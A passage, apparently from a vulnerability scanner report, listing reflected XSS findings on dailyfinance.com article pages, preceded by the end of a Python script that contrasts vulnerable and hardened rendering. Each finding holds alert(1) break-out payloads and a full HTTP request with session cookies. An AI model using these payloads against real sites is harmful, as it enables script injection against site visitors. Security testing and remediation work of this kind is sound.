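    """Same page, each sink encoded for what it is: percent-encoding for the URL itself,
    attribute encoding for href, a proper string literal for the script."""
    page_url = canonical_page_url(request_uri)
    return (
        f'<a name="aol-addthis" href="&body={html.escape(page_url, quote=True)}" rel="nofollow">Share</a>\n'
        f'<script>var pageUrl = {js_string_literal(page_url)};</script>'
    )


def parse_js_literal(rendered: str) -> str:
    """Read the pageUrl literal back; json.loads raises if the literal was broken out of."""
    match = re.search(r"var pageUrl = (.*?);</script>", rendered, re.S)
    return json.loads(match.group(1))


def breakout_survives(rendered: str) -> bool:
    """Does either of the report's payloads appear raw, i.e. still able to change the parse?"""
    return '"><script>' in rendered or '"-alert(1)-"' in rendered


if __name__ == "__main__":
    for uri in (ATTR_URI, JS_URI):
        print("vulnerable breaks out:", breakout_survives(render_vulnerable(uri)))  # True
        print("hardened breaks out:  ", breakout_survives(render_hardened(uri)))    # False
        print("hardened pageUrl:     ", parse_js_literal(render_hardened(uri)))
```

Rebuilding the query string is what makes the attribute case robust: the bug in the report is that a parameter *name* is reflected, and name-level percent-encoding closes that regardless of which parameters the page expects. For the script sink, the better fix remains the one the remediation text gives, moving the value out of inline script (for example into a data attribute read from the DOM); the JSON literal above is the fallback when that is not possible.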
1.426. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4d8"><script>alert(1)</script>2a26450345b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?5d4d8"><script>alert(1)</script>2a26450345b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?5d4d8"><script>alert(1)</script>2a26450345b=1" rel="nofollow">
...[SNIP]...
1.427. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd06b"-alert(1)-"4fd5929ab55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?cd06b"-alert(1)-"4fd5929ab55=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create
...[SNIP]...
1.428. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd53"><script>alert(1)</script>5a920242a3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?dcd53"><script>alert(1)</script>5a920242a3e=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?dcd53"><script>alert(1)</script>5a920242a3e=1" rel="nofollow">
...[SNIP]...
1.429. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174e8"-alert(1)-"be68957430 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?174e8"-alert(1)-"be68957430=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cr
...[SNIP]...
1.430. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a9a2"-alert(1)-"25304f24b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/investing-rules-tips-children-kids/19829360/?7a9a2"-alert(1)-"25304f24b1b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE
...[SNIP]...
1.431. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75d9"><script>alert(1)</script>2ce639e60d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/investing-rules-tips-children-kids/19829360/?c75d9"><script>alert(1)</script>2ce639e60d4=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/?c75d9"><script>alert(1)</script>2ce639e60d4=1" rel="nofollow">
...[SNIP]...
1.432. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc82b"-alert(1)-"431b8775d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?cc82b"-alert(1)-"431b8775d3d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.crea
...[SNIP]...
1.433. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac77"><script>alert(1)</script>9840934c28d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?6ac77"><script>alert(1)</script>9840934c28d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?6ac77"><script>alert(1)</script>9840934c28d=1" rel="nofollow">
...[SNIP]...
1.434. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f26c6"><script>alert(1)</script>c5b1d4d7c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?f26c6"><script>alert(1)</script>c5b1d4d7c67=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?f26c6"><script>alert(1)</script>c5b1d4d7c67=1" rel="nofollow">
...[SNIP]...
1.435. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1246"-alert(1)-"2015a39cfd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?b1246"-alert(1)-"2015a39cfd6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat
...[SNIP]...
1.436. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756c3"-alert(1)-"561280b8fde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?756c3"-alert(1)-"561280b8fde=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat
...[SNIP]...
1.437. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402a9"><script>alert(1)</script>a1893e49980 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?402a9"><script>alert(1)</script>a1893e49980=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?402a9"><script>alert(1)</script>a1893e49980=1" rel="nofollow">
...[SNIP]...
1.438. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8028"><script>alert(1)</script>92c563ca472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?e8028"><script>alert(1)</script>92c563ca472=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?e8028"><script>alert(1)</script>92c563ca472=1" rel="nofollow">
...[SNIP]...
1.439. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6290a"-alert(1)-"2d9c30fe247 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?6290a"-alert(1)-"2d9c30fe247=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create
...[SNIP]...
1.440. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a9e"><script>alert(1)</script>ebc8dfd08f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?c1a9e"><script>alert(1)</script>ebc8dfd08f0=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?c1a9e"><script>alert(1)</script>ebc8dfd08f0=1" rel="nofollow">
...[SNIP]...
1.441. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aa4f"-alert(1)-"d7347c308ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?5aa4f"-alert(1)-"d7347c308ff=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create
...[SNIP]...
1.442. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90dd5"-alert(1)-"48bede31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?90dd5"-alert(1)-"48bede31c=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create
...[SNIP]...
1.443. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fea7"><script>alert(1)</script>a40d3729cf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?5fea7"><script>alert(1)</script>a40d3729cf6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/
...[SNIP]...
<a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?5fea7"><script>alert(1)</script>a40d3729cf6=1" rel="nofollow">
...[SNIP]...
1.444. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b125"-alert(1)-"66d1000cc3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
